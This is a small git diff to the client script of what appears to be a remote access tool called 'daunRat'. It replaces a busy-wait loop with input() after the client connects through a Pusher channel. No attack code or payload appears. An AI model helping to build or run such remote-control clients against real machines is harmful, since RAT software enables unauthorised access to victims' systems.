diff --git a/client/daunRat.py b/client/daunRat.py index d280358..3df83d6 100644 --- a/client/daunRat.py +++ b/client/daunRat.py @@ -74,5 +74,4 @@ if __name__ == '__main__': print("daunRat by ANONYMUSSSS") receiver.connection.bind('pusher:connection_established', handle_connection_to_server) receiver.connect() - while True: - pass + input()